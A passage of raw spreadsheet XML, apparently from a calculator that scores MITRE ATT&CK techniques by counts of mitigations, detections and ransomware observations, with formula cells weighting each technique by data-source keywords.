      <c r="P158" s="51">
        <v>0</v>
      </c>
      <c r="Q158" s="51">
        <v>0</v>
      </c>
      <c r="R158" s="52" t="s">
        <v>349</v>
      </c>
      <c r="S158" s="51">
        <v>9</v>
      </c>
      <c r="T158" s="52" t="s">
        <v>350</v>
      </c>
      <c r="U158" s="51">
        <v>23</v>
      </c>
      <c r="V158" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.31904761904761908</v>
      </c>
      <c r="W158">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X158">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y158">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z158">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA158">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB158">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC158" s="29" t="s">
        <v>719</v>
      </c>
      <c r="AD158" s="25" t="str" cm="1">
        <f t="array" ref="AD158">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC158)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE158" s="25">
        <f>IF(AD158="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF158" s="25" t="str" cm="1">
        <f t="array" ref="AF158">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC158)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG158" s="25">
        <f>IF(AF158="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH158" s="25" t="str" cm="1">
        <f t="array" ref="AH158">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC158)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI158" s="25">
        <f>IF(AH158="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ158" s="25" t="str" cm="1">
        <f t="array" ref="AJ158">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC158)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK158" s="25">
        <f>IF(AJ158="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL158" s="25" t="str" cm="1">
        <f t="array" ref="AL158">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC158)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM158" s="25">
        <f>IF(AL158="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN158" s="52">
        <v>0</v>
      </c>
      <c r="AO158" s="51">
        <v>0</v>
      </c>
      <c r="AP158" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0201904761904767E-2</v>
      </c>
      <c r="AQ158" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16733968253968257</v>
      </c>
      <c r="AR158" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16733968253968257</v>
      </c>
      <c r="AS158" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT158" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU15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59" spans="1:47" ht="32.1">
      <c r="A159" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.24963142857142856</v>
      </c>
      <c r="B159" s="25">
        <f>SUM(H159,M159,V159)*(1+SUM(AE159,AG159,AI159,AK159,AM159))</f>
        <v>0.49631428571428565</v>
      </c>
      <c r="C159" s="25" t="s">
        <v>720</v>
      </c>
      <c r="D159" s="25" t="s">
        <v>180</v>
      </c>
      <c r="E159" s="25" t="s">
        <v>721</v>
      </c>
      <c r="F159" s="51">
        <v>1</v>
      </c>
      <c r="G159" s="51">
        <v>1</v>
      </c>
      <c r="H159" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I159">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J159">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K159">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L159">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M159" s="25">
        <v>0</v>
      </c>
      <c r="N159" s="51">
        <v>1</v>
      </c>
      <c r="O159" s="51">
        <v>28</v>
      </c>
      <c r="P159" s="51">
        <v>0</v>
      </c>
      <c r="Q159" s="51">
        <v>3</v>
      </c>
      <c r="R159" s="52" t="s">
        <v>722</v>
      </c>
      <c r="S159" s="51">
        <v>5</v>
      </c>
      <c r="T159" s="52" t="s">
        <v>723</v>
      </c>
      <c r="U159" s="51">
        <v>12</v>
      </c>
      <c r="V159" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.31428571428571428</v>
      </c>
      <c r="W159">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>17</v>
      </c>
      <c r="X159">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Y159">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.30909090909090908</v>
      </c>
      <c r="Z159">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>32</v>
      </c>
      <c r="AA159">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.32</v>
      </c>
      <c r="AB159">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.32</v>
      </c>
      <c r="AC159" s="29" t="s">
        <v>724</v>
      </c>
      <c r="AD159" s="25" t="str" cm="1">
        <f t="array" ref="AD159">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC159)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE159" s="25">
        <f>IF(AD159="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF159" s="25" t="str" cm="1">
        <f t="array" ref="AF159">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC159)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG159" s="25">
        <f>IF(AF159="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH159" s="25" t="str" cm="1">
        <f t="array" ref="AH159">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC159)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI159" s="25">
        <f>IF(AH159="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ159" s="25" t="str" cm="1">
        <f t="array" ref="AJ159">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC159)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK159" s="25">
        <f>IF(AJ159="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL159" s="25" t="str" cm="1">
        <f t="array" ref="AL159">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC159)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM159" s="25">
        <f>IF(AL159="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN159" s="52">
        <v>6</v>
      </c>
      <c r="AO159" s="51">
        <v>1</v>
      </c>
      <c r="AP159" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.24963142857142856</v>
      </c>
      <c r="AQ159" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16543809523809522</v>
      </c>
      <c r="AR159" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16543809523809522</v>
      </c>
      <c r="AS159" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT159" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU15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60" spans="1:47" ht="32.1">
      <c r="A160" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.5100000000000003E-2</v>
      </c>
      <c r="B160" s="25">
        <f>SUM(H160,M160,V160)*(1+SUM(AE160,AG160,AI160,AK160,AM160))</f>
        <v>0.55100000000000005</v>
      </c>
      <c r="C160" s="25" t="s">
        <v>725</v>
      </c>
      <c r="D160" s="25" t="s">
        <v>435</v>
      </c>
      <c r="E160" s="25" t="s">
        <v>726</v>
      </c>
      <c r="F160" s="51">
        <v>1</v>
      </c>
      <c r="G160" s="51">
        <v>1</v>
      </c>
      <c r="H160" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I160">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J160">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K160">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L160">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M160" s="25">
        <v>0</v>
      </c>
      <c r="N160" s="51">
        <v>0</v>
      </c>
      <c r="O160" s="51">
        <v>0</v>
      </c>
      <c r="P160" s="51">
        <v>0</v>
      </c>
      <c r="Q160" s="51">
        <v>0</v>
      </c>
      <c r="R160" s="52" t="s">
        <v>436</v>
      </c>
      <c r="S160" s="51">
        <v>10</v>
      </c>
      <c r="T160" s="51" t="s">
        <v>437</v>
      </c>
      <c r="U160" s="51">
        <v>23</v>
      </c>
      <c r="V160" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.31428571428571428</v>
      </c>
      <c r="W160">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>33</v>
      </c>
      <c r="X160">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.6</v>
      </c>
      <c r="Y160">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.6</v>
      </c>
      <c r="Z160">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA160">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB160">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC160" s="29" t="s">
        <v>595</v>
      </c>
      <c r="AD160" s="25" t="str" cm="1">
        <f t="array" ref="AD160">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC160)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE160" s="25">
        <f>IF(AD160="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF160" s="25" t="str" cm="1">
        <f t="array" ref="AF160">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC160)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG160" s="25">
        <f>IF(AF160="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH160" s="25" t="str" cm="1">
        <f t="array" ref="AH160">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC160)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI160" s="25">
        <f>IF(AH160="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ160" s="25" t="str" cm="1">
        <f t="array" ref="AJ160">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC160)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK160" s="25">
        <f>IF(AJ160="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL160" s="25" t="str" cm="1">
        <f t="array" ref="AL160">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC160)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM160" s="25">
        <f>IF(AL160="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN160" s="59">
        <v>0</v>
      </c>
      <c r="AO160" s="51">
        <v>0</v>
      </c>
      <c r="AP160" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.5100000000000003E-2</v>
      </c>
      <c r="AQ160" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18366666666666667</v>
      </c>
      <c r="AR160" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18366666666666667</v>
      </c>
      <c r="AS160" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT160" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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61" spans="1:47" ht="32.1">
      <c r="A161" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.9631428571428562E-2</v>
      </c>
      <c r="B161" s="25">
        <f>SUM(H161,M161,V161)*(1+SUM(AE161,AG161,AI161,AK161,AM161))</f>
        <v>0.49631428571428565</v>
      </c>
      <c r="C161" s="25" t="s">
        <v>727</v>
      </c>
      <c r="D161" s="25" t="s">
        <v>165</v>
      </c>
      <c r="E161" s="25" t="s">
        <v>728</v>
      </c>
      <c r="F161" s="51">
        <v>1</v>
      </c>
      <c r="G161" s="51">
        <v>1</v>
      </c>
      <c r="H161" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I161">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J161">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K161">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L161">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M161" s="25">
        <v>0</v>
      </c>
      <c r="N161" s="51">
        <v>1</v>
      </c>
      <c r="O161" s="51">
        <v>7</v>
      </c>
      <c r="P161" s="51">
        <v>0</v>
      </c>
      <c r="Q161" s="51">
        <v>0</v>
      </c>
      <c r="R161" s="53" t="s">
        <v>729</v>
      </c>
      <c r="S161" s="51">
        <v>10</v>
      </c>
      <c r="T161" s="51" t="s">
        <v>730</v>
      </c>
      <c r="U161" s="51">
        <v>19</v>
      </c>
      <c r="V161" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.31428571428571422</v>
      </c>
      <c r="W161">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>29</v>
      </c>
      <c r="X161">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.52727272727272723</v>
      </c>
      <c r="Y161">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.52727272727272723</v>
      </c>
      <c r="Z161">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA161">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB161">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
      <c r="AC161" s="29" t="s">
        <v>731</v>
      </c>
      <c r="AD161" s="25" t="str" cm="1">
        <f t="array" ref="AD161">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC161)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE161" s="25">
        <f>IF(AD161="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF161" s="25" t="str" cm="1">
        <f t="array" ref="AF161">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC161)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG161" s="25">
        <f>IF(AF161="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH161" s="25" t="str" cm="1">
        <f t="array" ref="AH161">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC161)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI161" s="25">
        <f>IF(AH161="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ161" s="25" t="str" cm="1">
        <f t="array" ref="AJ161">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC161)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK161" s="25">
        <f>IF(AJ161="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL161" s="25" t="str" cm="1">
        <f t="array" ref="AL161">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC161)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM161" s="25">
        <f>IF(AL161="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN161" s="59">
        <v>0</v>
      </c>
      <c r="AO161" s="51"/>
      <c r="AP161" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.9631428571428562E-2</v>
      </c>
      <c r="AQ161" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16543809523809522</v>
      </c>
      <c r="AR161" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16543809523809522</v>
      </c>
      <c r="AS161" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT161" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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62" spans="1:47">
      <c r="A162" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11572761904761905</v>
      </c>
      <c r="B162" s="25">
        <f>SUM(H162,M162,V162)*(1+SUM(AE162,AG162,AI162,AK162,AM162))</f>
        <v>0.49060952380952377</v>
      </c>
      <c r="C162" s="25" t="s">
        <v>732</v>
      </c>
      <c r="D162" s="25" t="s">
        <v>88</v>
      </c>
      <c r="E162" s="25" t="s">
        <v>733</v>
      </c>
      <c r="F162" s="51">
        <v>1</v>
      </c>
      <c r="G162" s="51">
        <v>1</v>
      </c>
      <c r="H162" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I162">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J162">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K162">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L162">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M162" s="25">
        <v>0</v>
      </c>
      <c r="N162" s="51">
        <v>0</v>
      </c>
      <c r="O162" s="51">
        <v>11</v>
      </c>
      <c r="P162" s="51">
        <v>2</v>
      </c>
      <c r="Q162" s="51">
        <v>0</v>
      </c>
      <c r="R162" s="52" t="s">
        <v>734</v>
      </c>
      <c r="S162" s="51">
        <v>10</v>
      </c>
      <c r="T162" s="51" t="s">
        <v>735</v>
      </c>
      <c r="U162" s="51">
        <v>16</v>
      </c>
      <c r="V162" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.30952380952380953</v>
      </c>
      <c r="W162">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>26</v>
      </c>
      <c r="X162">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Y162">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Z162">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>13</v>
      </c>
      <c r="AA162">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.13</v>
      </c>
      <c r="AB162">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.13</v>
      </c>
      <c r="AC162" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD162" s="25" t="str" cm="1">
        <f t="array" ref="AD162">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC162)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE162" s="25">
        <f>IF(AD162="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF162" s="25" t="str" cm="1">
